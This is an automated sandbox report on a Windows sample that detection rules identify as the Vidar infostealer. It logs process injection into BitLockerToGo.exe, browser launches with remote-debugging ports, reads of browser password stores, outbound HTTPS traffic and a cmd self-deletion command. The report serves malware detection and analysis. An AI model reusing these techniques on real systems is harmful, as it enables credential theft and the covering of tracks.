                  Source: chrome.exe, 00000007.00000003.1991904976.00005AF0014F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991641140.00005AF001454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994699586.00005AF00151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994325942.00005AF001454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991793893.00005AF0014E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994290879.00005AF001360000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991848726.00005AF0014E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                  Source: chrome.exe, 00000007.00000003.1994237299.00005AF001470000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/search
                  Source: chrome.exe, 00000007.00000003.1976735759.00005AF001278000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/search?q=$
                  Source: chrome.exe, 00000007.00000003.1988831473.00005AF000294000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.googleapis.com/auth/aida2
                  Source: chromecache_477.9.dr | String found in binary or memory: https://www.googleapis.com/auth/plus.me
                  Source: chromecache_477.9.dr | String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                  Source: chrome.exe, 00000007.00000003.1988831473.00005AF000294000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
                  Source: chrome.exe, 00000007.00000003.1988831473.00005AF000294000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
                  Source: chrome.exe, 00000007.00000003.1994290879.00005AF001360000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                  Source: chrome.exe, 00000007.00000003.1994157926.00005AF0010E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991641140.00005AF001454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994699586.00005AF00151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994201083.00005AF001484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994325942.00005AF001454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994290879.00005AF001360000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                  Source: chrome.exe, 00000007.00000003.1994237299.00005AF001470000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.Bvq7OK2_7ZA.2019.O/rt=j/m=q_dnp
                  Source: chrome.exe, 00000007.00000003.1994237299.00005AF001470000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.S4XVq7ljTQU.L.W.O/m=qmd
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://www.iheart.com/podcast/
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://www.instagram.com
                  Source: BitLockerToGo.exe, 00000003.00000002.2656831293.0000000005958000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://www.last.fm/
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://www.messenger.com
                  Source: BitLockerToGo.exe, 00000003.00000002.2659016940.0000000005C3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                  Source: BitLockerToGo.exe, 00000003.00000002.2659016940.0000000005C3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                  Source: BitLockerToGo.exe, 00000003.00000002.2659016940.0000000005C3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: BitLockerToGo.exe, 00000003.00000002.2659016940.0000000005C3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: 2cc80dabc69f58b6_1.12.dr | String found in binary or memory: https://www.msn.com/web-notification-icon-light.png
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://www.office.com
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://www.youtube.com
                  Source: chrome.exe, 00000007.00000003.2005855727.00005AF000CF4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/:
                  Source: chrome.exe, 00000007.00000003.2005855727.00005AF000CF4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/?feature=ytca
                  Source: chrome.exe, 00000007.00000003.2005855727.00005AF000CF4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/J
                  Source: chrome.exe, 00000007.00000003.2005855727.00005AF000CF4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://y.music.163.com/m/
                  Source: unknown | HTTPS traffic detected: 77.239.117.222:443 -> 192.168.2.8:49713 version: TLS 1.2
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0040EAB5 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow | 3_2_0040EAB5
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00405AD3 memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,CreateProcessA,Sleep,CloseDesktop | 3_2_00405AD3

                  System Summary

Source: 3.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Finds Vidar samples based on the specific strings | Author: Sekoia.io
Source: 0.2.N11R7lRasm.exe.aa00000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Finds Vidar samples based on the specific strings | Author: Sekoia.io
Source: 0.2.N11R7lRasm.exe.aa40000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Finds Vidar samples based on the specific strings | Author: Sekoia.io
Source: 0.2.N11R7lRasm.exe.aa20000.5.unpack, type: UNPACKEDPE | Matched rule: Finds Vidar samples based on the specific strings | Author: Sekoia.io
Source: 0.2.N11R7lRasm.exe.aa40000.1.unpack, type: UNPACKEDPE | Matched rule: Finds Vidar samples based on the specific strings | Author: Sekoia.io
Source: 0.2.N11R7lRasm.exe.a9e0000.3.unpack, type: UNPACKEDPE | Matched rule: Finds Vidar samples based on the specific strings | Author: Sekoia.io
Source: 0.2.N11R7lRasm.exe.aa00000.2.unpack, type: UNPACKEDPE | Matched rule: Finds Vidar samples based on the specific strings | Author: Sekoia.io
Source: 0.2.N11R7lRasm.exe.aa20000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Finds Vidar samples based on the specific strings | Author: Sekoia.io
Source: 0.2.N11R7lRasm.exe.a9e0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Finds Vidar samples based on the specific strings | Author: Sekoia.io
Source: 3.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Finds Vidar samples based on the specific strings | Author: Sekoia.io
Source: 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Metasploit Payloads - file msf.war - contents | Author: Florian Roth
Source: 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Finds Vidar samples based on the specific strings | Author: Sekoia.io
Source: 00000000.00000002.1855724656.000000000AA00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Finds Vidar samples based on the specific strings | Author: Sekoia.io
Source: 00000000.00000002.1855724656.000000000AA20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Finds Vidar samples based on the specific strings | Author: Sekoia.io
Source: 00000000.00000002.1855724656.000000000A9E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Finds Vidar samples based on the specific strings | Author: Sekoia.io
Source: 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Finds Vidar samples based on the specific strings | Author: Sekoia.io
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00404B3F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00415147
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00417D56
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0040AF7E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_004171E1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_004153AF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: String function: 0040D84A appears 136 times
Source: N11R7lRasm.exe | Static PE information: invalid certificate
Source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AADC000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs N11R7lRasm.exe
Source: N11R7lRasm.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
Source: 3.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0.2.N11R7lRasm.exe.aa00000.2.raw.unpack, type: UNPACKEDPE | Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0.2.N11R7lRasm.exe.aa40000.1.raw.unpack, type: UNPACKEDPE | Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0.2.N11R7lRasm.exe.aa20000.5.unpack, type: UNPACKEDPE | Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0.2.N11R7lRasm.exe.aa40000.1.unpack, type: UNPACKEDPE | Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0.2.N11R7lRasm.exe.a9e0000.3.unpack, type: UNPACKEDPE | Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0.2.N11R7lRasm.exe.aa00000.2.unpack, type: UNPACKEDPE | Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0.2.N11R7lRasm.exe.aa20000.5.raw.unpack, type: UNPACKEDPE | Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0.2.N11R7lRasm.exe.a9e0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 3.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 00000000.00000002.1855724656.000000000AA00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 00000000.00000002.1855724656.000000000AA20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 00000000.00000002.1855724656.000000000A9E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: f379r9.3.dr | Binary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@70/285@26/20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0040F029 CreateToolhelp32Snapshot,Process32First,StrCmpCA,Process32Next,StrCmpCA,CloseHandle
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\3I2CGZB2.htm
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | File created: C:\Users\user\AppData\Local\Temp\60955aac-6838-446c-a1a5-1b3b2b60e26f.tmp
Source: N11R7lRasm.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini
Source: C:\Users\user\Desktop\N11R7lRasm.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: rimglf379.3.dr, mohl68yct.3.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: N11R7lRasm.exe | ReversingLabs: Detection: 29%
Source: N11R7lRasm.exe | Virustotal: Detection: 25%
Source: N11R7lRasm.exe | String found in binary or memory: net/addrselect.go
Source: N11R7lRasm.exe | String found in binary or memory: github.com/saferwall/pe@v1.5.6/loadconfig.go
Source: unknown | Process created: C:\Users\user\Desktop\N11R7lRasm.exe "C:\Users\user\Desktop\N11R7lRasm.exe"
Source: C:\Users\user\Desktop\N11R7lRasm.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2468 --field-trial-handle=2372,i,16807786506752163932,14709765720490292279,262144 /prefetch:8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: unknown | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2608 --field-trial-handle=2468,i,12661693246344684828,3544474529301919065,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1876 --field-trial-handle=2028,i,10932699950084445446,663265973773707162,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5252 --field-trial-handle=2028,i,10932699950084445446,663265973773707162,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6648 --field-trial-handle=2028,i,10932699950084445446,663265973773707162,262144 /prefetch:8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" & rd /s /q "C:\ProgramData\t0r90" & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5344 --field-trial-handle=2028,i,10932699950084445446,663265973773707162,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\N11R7lRasm.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\N11R7lRasm.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\N11R7lRasm.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\N11R7lRasm.exe | Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\N11R7lRasm.exe | Section loaded: umpdc.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: wininet.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: dbghelp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: sspicli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: iertutil.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: windows.storage.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: wldp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: profapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: winhttp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: winnsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: urlmon.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: srvcli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: netutils.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: schannel.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ntasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: msasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: dpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: cryptsp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: rsaenh.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: cryptbase.dll
